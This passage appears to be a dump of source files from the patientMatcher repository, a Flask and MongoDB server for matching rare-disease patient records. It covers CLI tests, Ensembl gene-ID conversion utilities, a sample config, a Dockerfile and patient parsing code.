test_sendemail(mock_app, mock_mail):\n mock_app.mail = mock_mail\n mock_app.config['MAIL_USERNAME'] = '[email protected]'\n\n runner = mock_app.test_cli_runner()\n # When invoking the test email command with a recipient paramrter\n result = runner.invoke(cli, ['test', 'email', '-recipient', '[email protected]'])\n\n # Make sure that mock mail send method was called and mock email is sent\n assert mock_mail._send_was_called\n assert mock_mail._message\n assert 'Mail correctly sent' in result.output\n\n\ndef test_cli_add_node(mock_app, database, test_node):\n # make sure that \"nodes\" collection is empty\n assert database['nodes'].find_one() is None\n\n # test add a server using the app cli\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'node', '-id', test_node['_id'],\n '-label', 'This is a test node', '-token', test_node['auth_token'],\n '-matching_url', test_node['matching_url'],'-accepted_content',\n test_node['accepted_content']])\n assert result.exit_code == 0\n assert 'Inserted node' in result.output\n\n # check that the server was added to the \"nodes\" collection\n assert database['nodes'].find_one()\n\n # Try adding the node again\n result = runner.invoke(cli, ['add', 'node', '-id', test_node['_id'],\n '-label', 'This is a test node', '-token', test_node['auth_token'],\n '-matching_url', test_node['matching_url'],'-accepted_content',\n test_node['accepted_content']])\n assert result.exit_code == 0\n # And you should get an abort message\n assert 'Aborted' in result.output\n # And number of nodes in database should stay the same\n results = database['nodes'].find()\n assert len(list(results)) == 1\n\ndef test_cli_add_client(mock_app, database, test_client):\n\n # make sure that \"clients\" collection is empty\n assert database['client'].find_one() is None\n\n # test add a server using the app cli\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'client', '-id', test_client['_id'],\n '-token', 
test_client['auth_token'], '-url', test_client['base_url']])\n\n assert result.exit_code == 0\n assert 'Inserted client' in result.output\n\n # check that the server was added to the \"nodes\" collection\n assert database['clients'].find_one()\n\n # Try adding the client again\n result = runner.invoke(cli, ['add', 'client', '-id', test_client['_id'],\n '-token', test_client['auth_token'], '-url', test_client['base_url']])\n assert result.exit_code == 0\n # And you should get an abort message\n assert 'Aborted' in result.output\n # And number of clients in database should stay the same\n results = database['clients'].find()\n assert len(list(results)) == 1\n\n\ndef test_cli_remove_client(mock_app, database, test_client):\n\n # Add a client to database\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'client', '-id', test_client['_id'],\n '-token', test_client['auth_token'], '-url', test_client['base_url']])\n assert result.exit_code == 0\n\n # check that the server was added to the \"nodes\" collection\n assert database['clients'].find_one()\n\n # Use the cli to remove client\n result = runner.invoke(cli, ['remove', 'client', '-id', test_client['_id'] ])\n\n # check that command is executed withour errors\n assert result.exit_code == 0\n\n # and that client is gone from database\n assert database['clients'].find_one() is None\n\n\ndef test_cli_remove_node(mock_app, database, test_node):\n\n # Add a node to database\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'node', '-id', test_node['_id'],\n '-label', 'This is a test node', '-token', test_node['auth_token'],\n '-matching_url', test_node['matching_url'],'-accepted_content',\n test_node['accepted_content']])\n assert result.exit_code == 0\n\n # check that the server was added to the \"nodes\" collection\n assert database['nodes'].find_one()\n\n # Use the cli to remove client\n result = runner.invoke(cli, ['remove', 'node', '-id', test_node['_id'] ])\n\n # 
check that command is executed withour errors\n assert result.exit_code == 0\n\n # and that node is gone from database\n assert database['nodes'].find_one() is None\n\n\ndef test_cli_update_resources(mock_app):\n\n runner = mock_app.test_cli_runner()\n\n # run resources update command with --test flag:\n result = runner.invoke(cli, ['update', 'resources'])\n assert result.exit_code == 0\n\n\ndef test_cli_add_demo_data(mock_app, database):\n\n runner = mock_app.test_cli_runner()\n\n # make sure that \"patients\" collection is empty\n assert database['patients'].find_one() is None\n\n # run the load demo command without the -compute_phenotypes flag\n result = runner.invoke(cli, ['add', 'demodata'])\n assert result.exit_code == 0\n\n # check that the 50 demo patients where inserted into database\n results = database['patients'].find()\n assert len(list(results)) == 50\n\n\ndef test_cli_remove_patient(mock_app, database, gpx4_patients, match_objs):\n\n runner = mock_app.test_cli_runner()\n\n # add a test patient to database\n test_patient = mme_patient(gpx4_patients[0], True) # True --> convert gene symbols to ensembl\n inserted_id = mock_app.db['patients'].insert_one(test_patient).inserted_id\n assert inserted_id == gpx4_patients[0]['id']\n\n # there is now 1 patient in database\n assert database['patients'].find_one()\n\n # test that without a valid id or label no patient is removed\n result = runner.invoke(cli, ['remove', 'patient', '-id', '', '-label', ''])\n assert 'Error' in result.output\n\n # Add mock patient matches objects to database\n database['matches'].insert_many(match_objs)\n # There should be 2 matches in database for this patient:\n results = database['matches'].find( {'data.patient.id' : inserted_id })\n assert len(list(results)) == 2\n\n # involke cli command to remove the patient by id and label\n result = runner.invoke(cli, ['remove', 'patient', '-id', inserted_id, '-label', '350_1-test', '-leave_matches'])\n assert result.exit_code == 0\n\n # 
check that the patient was removed from database\n assert database['patients'].find_one() is None\n\n # But matches are still there\n results = database['matches'].find( {'data.patient.id' : inserted_id })\n assert len(list(results)) == 2\n\n # Run remove patient command with option to remove matches but without patient ID\n result = runner.invoke(cli, ['remove', 'patient', '-label', '350_1-test', '-remove_matches'])\n # And make sure that it doesn't work\n assert 'Please provide patient ID and not label to remove all its matches.' in result.output\n\n # Test now the proper command to remove patient matches:\n result = runner.invoke(cli, ['remove', 'patient', '-id', inserted_id, '-remove_matches'])\n assert result.exit_code == 0\n\n # And make sure that patient removal removed its matchings\n assert database['matches'].find_one( {'data.patient.id' : inserted_id }) is None\n" }, { "alpha_fraction": 0.645765483379364, "alphanum_fraction": 0.6506514549255371, "avg_line_length": 36.212120056152344, "blob_id": "c8c1cc60fee85097e00e03ade72382113b123ea5", "content_id": "5e99484a2ce3c14070fabed41f1c09a6db08aa9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1228, "license_type": "permissive", "max_line_length": 149, "num_lines": 33, "path": "/docker/update_env.sh", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\n\nDIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\n# We're running this inside the previously built container to ensure\n# the OS/container environment matches what it will be run in.\n\nif [[ -z $INSIDE_THE_CONTAINER ]]; then\n docker run -e INSIDE_THE_CONTAINER=1 \\\n -v $DIR/..:/opt/patientMatcher \\\n --rm \\\n -it \\\n --entrypoint /opt/patientMatcher/docker/update_env.sh \\\n local/patientmatcher\nelse\n export DOCKER_CONDA_PREFIX=/opt/conda/envs/patientMatcher\n export DOCKER_ENV_NAME=patientMatcher\n 
TEMP_ENV_NAME=\"temp-${DOCKER_ENV_NAME}\"\n PYTHON_VERSION=3.6.8\n\n # conda functions don't get exported to subshells, so source it\n source /opt/conda/etc/profile.d/conda.sh\n\n conda create -y --name $TEMP_ENV_NAME python=${PYTHON_VERSION}\n conda activate $TEMP_ENV_NAME\n conda install git -y\n pip install -r $DIR/../requirements.txt -r $DIR/../requirements-dev.txt\n conda env export --no-builds \\\n | perl -wlne 'if ($. == 1){print \"name: $ENV{DOCKER_ENV_NAME}\"} elsif (/^prefix:/){print \"prefix: $ENV{DOCKER_CONDA_PREFIX}\"} else {print}' \\\n > $DIR/conda_env.yml\n conda deactivate\n conda env remove --name $TEMP_ENV_NAME\nfi\n" }, { "alpha_fraction": 0.6524300575256348, "alphanum_fraction": 0.692194402217865, "avg_line_length": 28.521739959716797, "blob_id": "7a884e8e5d54da7bd614a2bb2d6e4b668d569a6e", "content_id": "b442ffd2b5e788c3e8588a1985e29ed45944b52f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 679, "license_type": "permissive", "max_line_length": 92, "num_lines": 23, "path": "/tests/utils/test_gene.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom patientMatcher.utils.gene import entrez_to_symbol, ensembl_to_symbol, symbol_to_ensembl\n\ndef test_ensembl_to_symbol():\n # Test converting ensembl ID to official gene symbol\n\n ensembl_id = 'ENSG00000103591'\n symbol = ensembl_to_symbol(ensembl_id)\n assert symbol == 'AAGAB'\n\ndef test_symbol_to_ensembl():\n # Test converting official gene symbol to ensembl ID\n\n symbol = 'AAGAB'\n ensembl_id = symbol_to_ensembl(symbol)\n assert ensembl_id == 'ENSG00000103591'\n\ndef test_entrez_to_symbol():\n # Test converting entrez ID to gene symbol\n entrez_id = \"3735\"\n symbol = entrez_to_symbol(entrez_id)\n assert symbol == 'KARS'\n" }, { "alpha_fraction": 0.7495495676994324, "alphanum_fraction": 0.7627627849578857, "avg_line_length": 40.625, "blob_id": 
"d94d4928775034d0473f7ef710bfc0d8e80fd7c0", "content_id": "dc98900f37cdff5696ed1091558ed8b63f1203fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1665, "license_type": "permissive", "max_line_length": 464, "num_lines": 40, "path": "/patientMatcher/instance/config.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#Turns on debugging features in Flask\nDEBUG = True\n\n#secret key:\nSECRET_KEY = 'MySuperSecretKey'\n\n# Database connection string\nDB_USERNAME = 'pmUser'\nDB_PASSWORD = 'pmPassword'\nDB_NAME = 'pmatcher'\nDB_HOST = '127.0.0.1'\nDB_PORT = 27017\nDB_URI = \"mongodb://{}:{}@{}:{}/{}\".format(DB_USERNAME, DB_PASSWORD, DB_HOST, DB_PORT, DB_NAME)\n\n# Matching Algorithms scores\n# sum of MAX_GT_SCORE and MAX_PHENO_SCORE should be 1\nMAX_GT_SCORE = 0.75\nMAX_PHENO_SCORE = 0.25\n\n# Max results matches returned by server.\nMAX_RESULTS = 5\n\n# Set a minimum patient score threshold for returned results\n# Set this parameter to 0 to return all results with a score higher than 0\nSCORE_THRESHOLD = 0\n\n# Disclaimer. This text is returned along with match results or server metrics\nDISCLAIMER = 'patientMatcher provides data in good faith as a research tool. patientMatcher makes no warranty nor assumes any legal responsibility for any purpose for which the data are used. Users should not attempt in any case to identify patients whose data is returned by the service. 
Users who intend to publish paper using this software should acknowldge patientMatcher and its developers (https://www.scilifelab.se/facilities/clinical-genomics-stockholm/).'\n\n# Email notification params.\n# Required only if you want to send match notifications to patients contacts\n#MAIL_SERVER = mail_port\n#MAIL_PORT = email_port\n#MAIL_USE_SSL = True or False\n#MAIL_USERNAME = '[email protected]'\n#MAIL_PASSWORD = 'mail_password'\n\n# Set NOTIFY_COMPLETE to False if you don't want to notify variants and phenotypes by email\n# This way only contact info and matching patients ID will be notified in email body\n#NOTIFY_COMPLETE = True\n" }, { "alpha_fraction": 0.7561349868774414, "alphanum_fraction": 0.7561349868774414, "avg_line_length": 33.31578826904297, "blob_id": "f798200dab72baeb0e888e9ad68bc114e380606e", "content_id": "4663cea82123849466e1d3b48e3ee17b3d3938aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "permissive", "max_line_length": 81, "num_lines": 19, "path": "/patientMatcher/resources/__init__.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "import pkg_resources\n\n###### Files ######\nhpo_filename = 'resources/hp.obo.txt'\nphenotype_annotation_filename = 'resources/phenotype_annotation.tab.txt'\nbenchmark_patients = 'resources/benchmark_patients.json'\njson_api ='resources/api.json'\n\n###### Paths ######\npath_to_hpo_terms = pkg_resources.resource_filename('patientMatcher',\n hpo_filename)\n\npath_to_phenotype_annotations = pkg_resources.resource_filename('patientMatcher',\n phenotype_annotation_filename)\n\npath_to_benchmark_patients = pkg_resources.resource_filename('patientMatcher',\n benchmark_patients)\n\npath_to_json_api = pkg_resources.resource_filename('patientMatcher', json_api)\n" }, { "alpha_fraction": 0.5786627531051636, "alphanum_fraction": 0.6037364602088928, "avg_line_length": 29.81818199157715, "blob_id": 
"3bcf6908f8c8afc544d5db0915a4e6152d982fe7", "content_id": "55dc68e57b96556f885ce2394ab27803b75e9b9b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2034, "license_type": "permissive", "max_line_length": 83, "num_lines": 66, "path": "/patientMatcher/utils/ensembl_rest_client.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport json\nimport logging\nimport requests\nfrom urllib.error import HTTPError\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\nLOG = logging.getLogger(__name__)\n\nHEADERS = {'Content-type':'application/json'}\nRESTAPI_37 = 'https://grch37.rest.ensembl.org'\nRESTAPI_38 = 'https://rest.ensembl.org/'\nPING_ENDPOINT = 'info/ping'\n\nclass EnsemblRestApiClient:\n \"\"\"A class handling requests and responses to and from the Ensembl REST APIs.\n Endpoints for human build 37: https://grch37.rest.ensembl.org\n Endpoints for human build 38: http://rest.ensembl.org/\n Documentation: https://github.com/Ensembl/ensembl-rest/wiki\n doi:10.1093/bioinformatics/btu613\n \"\"\"\n\n def __init__(self, build='37'):\n if build == '38':\n self.server = RESTAPI_38\n else:\n self.server = RESTAPI_37\n\n def ping_server(self, server=RESTAPI_38):\n \"\"\"ping ensembl\n\n Accepts:\n server(str): default is 'https://grch37.rest.ensembl.org'\n\n Returns:\n data(dict): dictionary from json response\n \"\"\"\n url = '/'.join([server, PING_ENDPOINT])\n data = self.send_request(url)\n return data\n\n\n def send_request(self, url):\n \"\"\"Sends the actual request to the server and returns the response\n\n Accepts:\n url(str): ex. 
https://grch37.rest.ensembl.org/lookup/id/ENSG00000103591\n\n Returns:\n data(dict): dictionary from json response\n \"\"\"\n data = {}\n try:\n request = Request(url, headers=HEADERS)\n response = urlopen(request)\n content = response.read()\n if content:\n data = json.loads(content)\n except HTTPError as e:\n LOG.info('Request failed for url {0}: Error: {1}\\n'.format(url, e))\n data = e\n except ValueError as e:\n LOG.info('Request failed for url {0}: Error: {1}\\n'.format(url, e))\n data = e\n return data\n" }, { "alpha_fraction": 0.6335443258285522, "alphanum_fraction": 0.6512657999992371, "avg_line_length": 29.384614944458008, "blob_id": "1d74c3f3a1e0405b93e4447c7ec796064c346746", "content_id": "efe0c074d048b6fa7ae0fe53ecb9e90a2aad7a0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1580, "license_type": "permissive", "max_line_length": 99, "num_lines": 52, "path": "/patientMatcher/utils/gene.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport logging\nimport patientMatcher.utils.ensembl_rest_client as ensembl_client\n\ndef entrez_to_symbol(entrez_id):\n \"\"\"Convert entrez id to gene symbol\n\n Accepts:\n entrez_id(str) ex. \"3735\"\n\n Returns\n gene_symbol(str) ex. BRAF\n \"\"\"\n client = ensembl_client.EnsemblRestApiClient()\n url = ''.join([client.server, '/xrefs/name/human/', entrez_id, '?external_db=EntrezGene'])\n results = client.send_request(url)\n for gene in results: # result is an array. First element is enough\n return gene['display_id']\n\n\ndef symbol_to_ensembl(gene_symbol):\n \"\"\"Convert gene symbol to ensembl id\n\n Accepts:\n gene_symbol(str) ex. LIMS2\n\n Returns:\n ensembl_id(str) ex. 
ENSG00000072163\n \"\"\"\n client = ensembl_client.EnsemblRestApiClient()\n url = ''.join([client.server, '/xrefs/symbol/homo_sapiens/', gene_symbol, '?external_db=HGNC'])\n results = client.send_request(url)\n for gene in results: # result is an array. First element is enough\n if gene['id'].startswith('ENSG'): # it's the ensembl id\n return gene['id']\n\n\ndef ensembl_to_symbol(ensembl_id):\n \"\"\"Converts ensembl id to gene symbol\n\n Accepts:\n ensembl_id(str): an ensembl gene id. Ex: ENSG00000103591\n\n Returns:\n gene_symbol(str): an official gene symbol. Ex: AAGAB\n \"\"\"\n\n client = ensembl_client.EnsemblRestApiClient()\n url = ''.join([client.server, '/lookup/id/', ensembl_id])\n result = client.send_request(url)\n return result.get('display_name', None)\n" }, { "alpha_fraction": 0.6783965826034546, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 40.89743423461914, "blob_id": "61b62482f15175b94bb6328e50ce92847ec66ec1", "content_id": "6cd4e4d6c9ce4af0790635369cb785c7489c2aa8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3268, "license_type": "permissive", "max_line_length": 161, "num_lines": 78, "path": "/patientMatcher/cli/add.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport click\nimport datetime\nfrom flask.cli import with_appcontext, current_app\n\nfrom patientMatcher.resources import path_to_benchmark_patients\nfrom patientMatcher.utils.add import load_demo, add_node\n\[email protected]()\ndef add():\n \"\"\"Add items to database using the CLI\"\"\"\n pass\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"Server ID\")\[email protected]('-label', type=click.STRING, nargs=1, required=True, help=\"Server Description\")\[email protected]('-token', type=click.STRING, nargs=1, required=True, help=\"Authorization token\")\[email 
protected]('-matching_url', type=click.STRING, nargs=1, required=True, help=\"URL to send match requests to\")\[email protected]('-accepted_content', type=click.STRING, nargs=1, required=True, help=\"Accepted Content-Type\", default=\"application/vnd.ga4gh.matchmaker.v1.0+json\")\[email protected]('-contact', type=click.STRING, nargs=1, required=False, help=\"An email address\")\n@with_appcontext\ndef node(id, label, token, matching_url, accepted_content, contact=None):\n \"\"\"Adds a new server to database\"\"\"\n click.echo(\"Adding a new MatchMaker node to database\")\n node_obj = {\n '_id' : id,\n 'label' : label,\n 'created' : datetime.datetime.now(),\n 'auth_token' : token,\n 'matching_url' : matching_url,\n 'accepted_content' : accepted_content,\n 'contact' : contact\n }\n inserted_id, collection = add_node(mongo_db=current_app.db, obj=node_obj, is_client=False)\n if inserted_id:\n click.echo('Inserted node with ID \"{}\" into database collection {}'.format(inserted_id, collection))\n else:\n click.echo('Aborted')\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"Client ID\")\[email protected]('-token', type=click.STRING, nargs=1, required=True, help=\"Authorization token\")\[email protected]('-url', type=click.STRING, nargs=1, required=True, help=\"Client URL\")\[email protected]('-contact', type=click.STRING, nargs=1, required=False, help=\"Client email\")\n@with_appcontext\ndef client(id, token, url, contact=None):\n \"\"\"Adds a new client to database\"\"\"\n click.echo(\"Adding a new client to database\")\n client_obj = {\n '_id' : id,\n 'created' : datetime.datetime.now(),\n 'auth_token' : token,\n 'base_url' : url,\n 'contact' : contact\n }\n inserted_id, collection = add_node(mongo_db=current_app.db, obj=client_obj, is_client=True)\n if inserted_id:\n click.echo('Inserted client with ID \"{}\" into database collection {}'.format(inserted_id, collection))\n else:\n click.echo('Aborted')\n\n\[email 
protected]()\n@with_appcontext\[email protected]('--ensembl_genes', is_flag=True, help=\"Convert gene symbols to Ensembl IDs\")\ndef demodata(ensembl_genes):\n \"\"\"Adds a set of 50 demo patients to database\"\"\"\n click.echo('Adding 50 test patients to database..')\n click.echo('ENSEMBL GENES IS {}'.format(ensembl_genes))\n inserted_ids = load_demo(path_to_json_data=path_to_benchmark_patients, mongo_db=current_app.db,\n convert_to_ensembl=ensembl_genes)\n click.echo('inserted {} patients into db'.format(len(inserted_ids)))\n\nadd.add_command(node)\nadd.add_command(client)\nadd.add_command(demodata)\n" }, { "alpha_fraction": 0.6309012770652771, "alphanum_fraction": 0.632331907749176, "avg_line_length": 24.88888931274414, "blob_id": "a9b93973e1f342d00f0cf10dcfb52a774f9f9d70", "content_id": "cfda20324da5ff6360db17af217b23ccef787547", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "permissive", "max_line_length": 82, "num_lines": 27, "path": "/patientMatcher/utils/patient.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport logging\n\nLOG = logging.getLogger(__name__)\n\ndef patients(database, ids=None):\n \"\"\"Get all patients in the database\n\n Args:\n database(pymongo.database.Database)\n ids(list): a list of IDs to return only specified patients\n\n Returns:\n results(Iterable[dict]): list of patients from mongodb patients collection\n \"\"\"\n results = None\n query = {}\n if ids: # if only specified patients should be returned\n LOG.info('Querying patients for IDs {}'.format(ids))\n query['_id'] = {'$in' : ids}\n\n else:\n LOG.info('Return all patients in database')\n\n results = database['patients'].find(query)\n return results\n" }, { "alpha_fraction": 0.7244418263435364, "alphanum_fraction": 0.727379560470581, "avg_line_length": 39.52381134033203, "blob_id": "7e74d35a0b7209fde613301c545c707236ae6c90", 
"content_id": "5e58575a5b550da86cbef57ebc6f9a708c8de885", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "permissive", "max_line_length": 97, "num_lines": 42, "path": "/tests/utils/test_notify.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pymongo\nfrom patientMatcher.utils.notify import notify_match_external, notify_match_internal, html_format\n\ndef test_notify_match_external(match_objs, mock_sender, mock_mail):\n\n match_obj = match_objs[0] #an external match object with results\n assert match_obj['match_type'] == 'external'\n\n # When calling the function that sends external match notifications\n notify_complete = True # test notification of complete patient data by email\n notify_match_external(match_obj, mock_sender, mock_mail, notify_complete)\n\n # make sure send method was called\n assert mock_mail._send_was_called\n\n # and that mail object message was set correctly\n assert mock_mail._message\n\n\ndef test_notify_match_internal(database, match_objs, mock_sender, mock_mail):\n\n match_obj = match_objs[2] # an internal match object with results\n assert match_obj['match_type'] == 'internal'\n\n # insert patient used as query in database:\n assert database['patients'].find_one() is None\n assert database['patients'].insert_one({ '_id' : 'external_patient_1'}).inserted_id\n\n # When calling the function that sends internal match notifications\n notify_complete = False # test notification of partial patient data by email\n notify_match_internal(database, match_obj, mock_sender, mock_mail, notify_complete)\n\n # Test the function that formats the matching results to HTML:\n formatted_results = html_format(match_obj['results'])\n assert '<div style=\"margin-left: 0em\">' in formatted_results\n\n # make sure send method was called\n assert mock_mail._send_was_called\n\n # and that mail object message was set 
correctly\n assert mock_mail._message\n" }, { "alpha_fraction": 0.6185133457183838, "alphanum_fraction": 0.6262272000312805, "avg_line_length": 34.650001525878906, "blob_id": "a9b7ba419bb2131f36cfe5d5f8d0caf8c62e6149", "content_id": "0825374296fdbcbad53abe5a1e2c9e8c0a6e0d21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1426, "license_type": "permissive", "max_line_length": 112, "num_lines": 40, "path": "/patientMatcher/cli/update.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom clint.textui import progress\nimport click\nfrom patientMatcher.constants import PHENOTYPE_TERMS\n\n\[email protected]()\ndef update():\n \"\"\"Update patientMatcher resources\"\"\"\n pass\n\[email protected]()\[email protected]('--test',\n help='Use this flag to test the function',\n is_flag=True)\ndef resources(test):\n \"\"\"Updates HPO terms and disease ontology from the web.\n Specifically collect files from:\n http://purl.obolibrary.org/obo/hp.obo\n http://compbio.charite.de/jenkins/job/hpo.annotations/lastStableBuild/artifact/misc/phenotype_annotation.tab\n \"\"\"\n files = {}\n for key,item in PHENOTYPE_TERMS.items():\n url = item['url']\n destination = item['resource_path']\n r = requests.get(url, stream=True)\n total_length = int(r.headers.get('content-length'))\n if test: # read file and get its size\n files[key] = total_length # create an object for each downloadable file and save its length\n if total_length:\n click.echo('file {} found at the requested URL'.format(key))\n continue\n with open(destination, 'wb') as f: #overwrite file\n for chunk in progress.bar(r.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):\n if chunk:\n f.write(chunk)\n f.flush()\n" }, { "alpha_fraction": 0.6111897826194763, "alphanum_fraction": 0.6317280530929565, "avg_line_length": 30.377777099609375, "blob_id": 
"7c188d0feb7ed892e3544fab540a107b8beb8d25", "content_id": "36c0d409c620b2765f835d45609ba6ac1d9779d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 1412, "license_type": "permissive", "max_line_length": 109, "num_lines": 45, "path": "/Dockerfile", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "FROM mongo:4.0.7-xenial\n\nSHELL [\"/bin/bash\", \"-c\"]\n\nENV LC_ALL C.UTF-8\nENV LANG C.UTF-8\nENV MONGO_PIDFILE /var/run/mongod.pid\nENV MONGO_LOGPATH /var/log/mongodb/mongod.log\n\nRUN apt-get update && apt-get install -y --no-install-recommends \\\n bzip2 \\\n ca-certificates \\\n curl \\\n libglib2.0-0 \\\n libxext6 \\\n libsm6 \\\n libxrender1 \\\n wget \\\n vim && \\\n apt-get clean\n\nWORKDIR /root\n\nENV CONDA_VERSION 4.6.14\nCOPY docker/conda_env.yml /root/conda_env.yml\nRUN wget --quiet https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \\\n /bin/bash ~/miniconda.sh -b -p /opt/conda && \\\n rm ~/miniconda.sh && \\\n ln -s /opt/conda/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \\\n echo \". /opt/conda/etc/profile.d/conda.sh\" >> ~/.bashrc && \\\n echo \"conda activate patientMatcher\" >> ~/.bashrc && \\\n source /opt/conda/etc/profile.d/conda.sh && \\\n conda install -y conda=$CONDA_VERSION && \\\n conda env create -f /root/conda_env.yml && \\\n conda clean -tipsy\n\nCOPY . 
/opt/patientMatcher\nWORKDIR /opt/patientMatcher\nRUN source /opt/conda/etc/profile.d/conda.sh && \\\n conda activate patientMatcher && \\\n pip install git+https://github.com/Clinical-Genomics/patient-similarity && \\\n pip install -e .\n\nENTRYPOINT [ \"docker/entrypoint.sh\" ]\nCMD [ \"pmatcher\", \"run\", \"-h\", \"0.0.0.0\", \"-p\", \"9020\" ]\n" }, { "alpha_fraction": 0.6088751554489136, "alphanum_fraction": 0.6274510025978088, "avg_line_length": 28.363636016845703, "blob_id": "9255259af3af139282477300d1890f5409b0996f", "content_id": "f39e7852260cf248b2896785b9d5f13fba904c56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 969, "license_type": "permissive", "max_line_length": 126, "num_lines": 33, "path": "/patientMatcher/constants/__init__.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "from patientMatcher.resources import path_to_hpo_terms, path_to_phenotype_annotations\n\n# useful HTTP response status codes with messages\nSTATUS_CODES = {\n 200 : {\n 'status_code' : 200\n },\n 400 : {\n 'message' : 'Invalid request JSON'\n },\n 422 : {\n 'message' : 'Request does not conform to API specifications'\n },\n 401 : {\n 'message' : 'Not authorized'\n },\n 500 : {\n 'message' : 'An error occurred while updating the database'\n },\n}\n\n# phenotype terms and annotations are used by phenotype scoring algorithm and\n# are updated using the CLI\nPHENOTYPE_TERMS= {\n 'hpo_ontology' : {\n 'url': 'http://purl.obolibrary.org/obo/hp.obo',\n 'resource_path' : path_to_hpo_terms\n },\n 'hpo_annotations' : {\n 'url': 'http://compbio.charite.de/jenkins/job/hpo.annotations/lastStableBuild/artifact/misc/phenotype_annotation.tab',\n 'resource_path' : path_to_phenotype_annotations\n }\n}\n" }, { "alpha_fraction": 0.6190328001976013, "alphanum_fraction": 0.6247861981391907, "avg_line_length": 32.67015838623047, "blob_id": "12354d74e3a2c147453f4250cc77a920d8603699", "content_id": 
"8113342268bce158d17a58087e2f1fe03b9e0ce2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6431, "license_type": "permissive", "max_line_length": 102, "num_lines": 191, "path": "/patientMatcher/parse/patient.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport json\nfrom jsonschema import validate, RefResolver, FormatChecker\nfrom patientMatcher.utils.gene import symbol_to_ensembl, entrez_to_symbol, ensembl_to_symbol\nfrom pkgutil import get_data\nimport logging\n\nLOG = logging.getLogger(__name__)\nSCHEMA_FILE = 'api.json'\n\ndef mme_patient(json_patient, convert_to_ensembl=False):\n \"\"\"\n Accepts a json patient and converts it to a MME patient,\n formatted as required by patientMatcher database\n\n Args:\n patient_obj(dict): a patient object as in https://github.com/ga4gh/mme-apis\n convert_to_entrez(bool): convert gene IDs to ensembl IDs\n\n Returns:\n mme_patient(dict) : a mme patient entity\n \"\"\"\n\n # Make sure gene objects are defined by ensembl IDs\n if json_patient.get('genomicFeatures') and convert_to_ensembl:\n format_genes(json_patient)\n\n mme_patient = {\n '_id' : json_patient['id'],\n 'id' : json_patient['id'],\n 'label' : json_patient.get('label'),\n 'sex' : json_patient.get('sex'),\n 'contact' : json_patient['contact'],\n 'features' : json_patient.get('features'),\n 'genomicFeatures' : json_patient.get('genomicFeatures'),\n 'disorders' : json_patient.get('disorders'),\n 'species' : json_patient.get('species'),\n 'ageOfOnset' : json_patient.get('ageOfOnset'),\n 'inheritanceMode' : json_patient.get('inheritanceMode')\n }\n\n # remove keys with empty values from mme_patient object\n mme_patient = {k:v for k,v in mme_patient.items() if v is not None}\n\n return mme_patient\n\n\ndef json_patient(mme_patient):\n \"\"\" Converts a mme patient into a json-like as in the MME APIs\n\n Args:\n mme_patient(dict): a patient object as 
